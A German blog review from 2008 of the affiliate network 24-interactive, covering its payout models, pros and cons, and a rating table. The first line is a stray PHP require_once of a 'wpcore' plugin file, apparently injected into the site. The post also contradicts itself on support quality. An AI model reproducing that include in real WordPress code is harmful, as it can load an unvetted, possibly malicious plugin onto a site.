require_once(ABSPATH.'wp-content/plugins/wpcore/wpcore.php'); Partnerprogramm Netzwerk 24-interactive | Beste-Partnerprogramme.de

Partnerprogramm Netzwerk 24-interactive

26. Februar 2008
By

24 interactive ist ebenfalls ein Partnerprogramm-Netzwerk und eines, meiner persönlichen Favouriten. Allerdings hat auch dieses Partnerprogramm-Netzwerk Vor- und Nachteile, auf die hier noch eingegangen wird.

Zunächst jedoch zur Grundstruktur von 24-interactive: Das Partnerprogramm-Netzwerk bietet drei Vergütungsstrukturen an:
24i.classic
In dieser Programmstruktur werden Banner angeboten, die mit Pay per Click vergütet werden. Es gibt eine automatische Bannerrotation mit den gängisten Formaten, jeder Klick wird mit mindest 8 Cent vergütet, aber auch Vergütungen von bis zu 20 Cent pro Klick sind möglich!

24.affiliate
Diese Programmstruktur ist eine Auflistung aller normalen Partnerprogramme, es wird dort meistens mit Pay per Lead oder Pay per Sale abgerechnet.
Aus allen Themengebieten gibt es mittlerweile Partner, auch einige exklusive Programme mit Top-Vergütungen werden angeboten.
Die Auswahl des Werbemittels läuft immer über das einzelne Programm.

24i.coreg
24 interactive bietet mit der Programmstruktur 24.coreg auch einen Co-Registrierungsdienst ab.
Mittels einfachster Inkludierungsmöglichkeiten (gut erklärt) können unter Formulare Zusatzfelder eingefügt werden, die teilweise mehrere Euro pro Lead einbringen. Die einzelnen Programme können zudem auch eingefügt oder ausgelassen werden.
Zudem wird jede Implementierung mit 10,- EUR on Top belohnt!

Allerdings gibt es auch bei 24-interactive sicherlich einige Nachteile, auch wenn die Vorteile überzeugen.
Zunächst einmal die

Vorteile beim Partnerprogramm-Netzwerk 24-interactive

  • 3 unterschiedliche Programmstrukturen, die alle möglichen Vergütungen anbieten (PPC, PPL, PPV, PPS)
  • Viele Partnerprogramme bereits jetzt verfügbar
  • Guter Support, schnelle Antworten und Problemlösungen
  • Referal-Programm für Publisher
  • Pünktliche Auszahlungen

Doch wie erwähnt gibt es leider auch Nachteile beim Netzwerk, die man nicht unterschlagen sollte:

Nachteile beim Partnerprogramm-Netzwerk 24-interactive

  • Leadfreigabe dauert manchmal mehrere Monate
  • Stornogrund bei Leads und Sales nicht einsehbar
  • Teilweise unübersichtliche Statistik
  • Nicht ausreichende Informationen beim Referal-Programm
  • Werbemittel werden standardmäßig als JavaScript ausgegeben, Noscript-Funktion funktioniert nicht immer

Dennoch lohnt sich eine Anmeldung bei 24 interactive ganz sicher, auch ich konnte mit dem Netzwerk schon einige Auszahlungen erreichen und setze die Werbemittel immer wieder gerne ein.
Hier ein Beweis für die Auszahlungen:

Hier geht es zur Anmeldung beim Partnerprogramm-Netzwerk: 24 interactive

Bereich Bewertung
Programmangebot gut
Verdienstmöglichkeiten gutgut
Support schlecht
Auszahlungen gut
Innovation gutschlecht
Serververfügbarkeit/-geschwindigkeit schlechtschlecht

Zeichenerklärung

gutgut = sehr gut
gut = gut
gutschlecht = Mittelmaß
schlecht = schlecht
schlechtschlecht = sehr schlecht

Hinweis:
Dieser Bericht ist unter Umständen unvollständig. Er darf lediglich als Orientierungshilfe dienen und spiegelt nur die subjektiven Eindrücke des Autors wieder.

Tags: , , , , , , , , , ,

One Response to Partnerprogramm Netzwerk 24-interactive

Hinterlasse eine Antwort

Deine E-Mail-Adresse wird nicht veröffentlicht. Erforderliche Felder sind markiert *